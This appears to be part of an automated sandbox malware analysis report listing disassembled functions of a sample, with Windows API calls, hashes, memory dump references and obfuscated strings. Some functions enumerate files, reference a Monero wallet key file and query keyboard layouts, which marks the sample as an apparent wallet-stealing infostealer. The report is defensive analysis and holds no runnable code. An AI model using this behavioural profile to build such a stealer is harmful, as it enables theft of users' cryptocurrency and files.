                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00FC14B0,00FC0C2A), ref: 00FADAEB
                                    • StrCmpCA.SHLWAPI(?,00FC14B4), ref: 00FADB33
                                    • StrCmpCA.SHLWAPI(?,00FC14B8), ref: 00FADB49
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FADDCC
                                    • FindClose.KERNEL32(000000FF), ref: 00FADDDE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 94432bee01ae5c55d6e0a666200b9444cf969dd991d41e84dcf579f5c7e929d1
                                    • Instruction ID: 795a4de18ecb5a4f2eca73299f137777efbdbf33017377e08da64e8fdffd8d37
                                    • Opcode Fuzzy Hash: 94432bee01ae5c55d6e0a666200b9444cf969dd991d41e84dcf579f5c7e929d1
                                    • Instruction Fuzzy Hash: 0F9145B6900104ABCB14FBB1EC56DED737CAF85300F408568F81A96585EF38DB59AF92
                                    Function 00FB7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • GetKeyboardLayoutList.USER32(00000000,00000000,00FC05AF), ref: 00FB7BE1
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00FB7BF9
                                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00FB7C0D
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00FB7C62
                                    • LocalFree.KERNEL32(00000000), ref: 00FB7D22
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: 58ffda9cda34835d85c16236fc58012a7a146414b8489d01f894e9fa4b6d8643
                                    • Instruction ID: d4bd5602945e60f5f26e6a0dbf67f33f426dd3c728394c79bb269b905516bab9
                                    • Opcode Fuzzy Hash: 58ffda9cda34835d85c16236fc58012a7a146414b8489d01f894e9fa4b6d8643
                                    • Instruction Fuzzy Hash: 25414E71940218ABDB24EB95DC99FEEB7B8FF48700F2041D9E00966181DB386F85DFA1
                                    Function 01378342 Relevance: 10.4, Strings: 7, Instructions: 1644COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 3W,1$Ao?=$Zy$fVO$t'o$t_}|$wMy
                                    • API String ID: 0-2597736597
                                    • Opcode ID: 7ffd7e6afa5487430b2f2155ab6f33f6cc1c63bbbf0e7070b899c26c0ddd00d5
                                    • Instruction ID: 33c26d595322a94c24e1db8b1d2f21e7b35eb87baed2d0baff41a2ea2e830358
                                    • Opcode Fuzzy Hash: 7ffd7e6afa5487430b2f2155ab6f33f6cc1c63bbbf0e7070b899c26c0ddd00d5
                                    • Instruction Fuzzy Hash: 9BB24BF3A0C2049FE3086E2DEC8567ABBD5EF94720F1A863DEAC5C3744E93558058697
                                    Function 0137BA0D Relevance: 10.4, Strings: 7, Instructions: 1602COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 2p}{$Ey;~$VG~u$b*~^$v=z'$|;8'$}=5-
                                    • API String ID: 0-1889371713
                                    • Opcode ID: 4bebcf5dadbcabcb26c699edb3b3cb31a62fcd40ac284eff8d7e2dbf724e5d02
                                    • Instruction ID: 0a766712b60fc4e70884d4759ef6361abefd05d78bc9674aaca82246fedcfd6b
                                    • Opcode Fuzzy Hash: 4bebcf5dadbcabcb26c699edb3b3cb31a62fcd40ac284eff8d7e2dbf724e5d02
                                    • Instruction Fuzzy Hash: 50B2E6F3A086009FE3046F2DEC8566AFBE9EF94720F1A492DEAC4D3744E63558058797
                                    Function 00FAE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                      • Part of subcall function 00FBA920: lstrcpy.KERNEL32(00000000,?), ref: 00FBA972
                                      • Part of subcall function 00FBA920: lstrcat.KERNEL32(00000000), ref: 00FBA982
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00FC0D73), ref: 00FAE4A2
                                    • StrCmpCA.SHLWAPI(?,00FC14F8), ref: 00FAE4F2
                                    • StrCmpCA.SHLWAPI(?,00FC14FC), ref: 00FAE508
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00FAEBDF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                    • String ID: \*.*
                                    • API String ID: 433455689-1173974218
                                    • Opcode ID: 133947dfba822589dd06cf8bbe345b3142c6bf0b59591b74ff11cf6532233d24
                                    • Instruction ID: 34c481134777012a8015c91a4e12e0d56b3f3d6f17bac8079a423b6cd082718d
                                    • Opcode Fuzzy Hash: 133947dfba822589dd06cf8bbe345b3142c6bf0b59591b74ff11cf6532233d24
                                    • Instruction Fuzzy Hash: 13126871910118BBDB24FB71DDA6EED7378AF54300F4045A8B50A96091EF38AF49EF92
                                    Function 01379E92 Relevance: 9.2, Strings: 6, Instructions: 1677COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ,;LG$4vVm$_um$c-7$x__"$~3}_
                                    • API String ID: 0-3965853264
                                    • Opcode ID: 7c3e5e2f2b651a3865d96533d1522b1e032e33b1cd397e825b0c85a6619286db
                                    • Instruction ID: 32900f815220b75059c51e154914290a42d8060d763cf31f2f0a99b0d82c5066
                                    • Opcode Fuzzy Hash: 7c3e5e2f2b651a3865d96533d1522b1e032e33b1cd397e825b0c85a6619286db
                                    • Instruction Fuzzy Hash: D1B22CF3A0C204AFE3046E2DEC8567ABBD9EF94720F1A453DEAC5C3744EA3558058697
                                    Function 0136C7F6 Relevance: 9.2, Strings: 6, Instructions: 1668COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 'Xu$9@z#$Xv/=$aN|Y$fP|$~oq~
                                    • API String ID: 0-1385337697
                                    • Opcode ID: 348f9a77b03f76ea02e86d49561483dc26342a59fbf6c8890d9d299973251b34
                                    • Instruction ID: 372c6ce43f5f1afeaa2264d89a0d4cb0bb953587a41034dede4e9cabb50072ac
                                    • Opcode Fuzzy Hash: 348f9a77b03f76ea02e86d49561483dc26342a59fbf6c8890d9d299973251b34
                                    • Instruction Fuzzy Hash: 02B22BF3A082049FE304AE2DEC8567ABBD9EFD4720F1A853DEAC4C3744E93559058697
                                    Function 01374E82 Relevance: 9.1, Strings: 6, Instructions: 1593COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: /Jo|$>,A?$?#[t$l/y?$lI=$vE_
                                    • API String ID: 0-519695593
                                    • Opcode ID: 25aa053c7035132c157726be2f05c8397f38b206efeb08e6183c1ca938723619
                                    • Instruction ID: 438837dd9d4e05c665245c589b2567988dbbd99fb58cb27e6d1b505704dc780e
                                    • Opcode Fuzzy Hash: 25aa053c7035132c157726be2f05c8397f38b206efeb08e6183c1ca938723619
                                    • Instruction Fuzzy Hash: 73B2F5F3A0C214AFE3046F29EC8567AFBE9EF94720F1A492DE6C587340E63558418797
                                    Function 01381116 Relevance: 8.6, Strings: 6, Instructions: 1107COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: (>w$9/;$Cz7>$Q<L $grw]$gr~]
                                    • API String ID: 0-3341737076
                                    • Opcode ID: d3eccd56a21bd5e1299b25d85ed95e19a4aba32e7f8bb63ab86158c341720700
                                    • Instruction ID: d1f2454a986c060338e24d580167770e8d6a807ace9048729e70bf6b019ec362
                                    • Opcode Fuzzy Hash: d3eccd56a21bd5e1299b25d85ed95e19a4aba32e7f8bb63ab86158c341720700
                                    • Instruction Fuzzy Hash: 4F7216F3608200AFE7046E2DEC8577ABBE5EF94720F1A493DEAC4C7744E63598118697
                                    Function 0137198C Relevance: 7.9, Strings: 5, Instructions: 1621COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #UM$$_/$5ins$[w$l67
                                    • API String ID: 0-3994591404
                                    • Opcode ID: 8b1c89071fe80a56c6d04a42346b7b1f5098f724914047fb34f342b9390ee199
                                    • Instruction ID: c25827dc7d087391de19114c91f9849ce2aae955c2b4da3f5c9f2cd0ac424874
                                    • Opcode Fuzzy Hash: 8b1c89071fe80a56c6d04a42346b7b1f5098f724914047fb34f342b9390ee199
                                    • Instruction Fuzzy Hash: 6AB206F3A0C2149FE3046E2DEC8567ABBE9EF94320F1A453DEAC4C3744EA7558058697
                                    Function 0136FF7E Relevance: 7.8, Strings: 5, Instructions: 1593COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ai{$gHY|$~|_$q~o$ugo
                                    • API String ID: 0-401286909
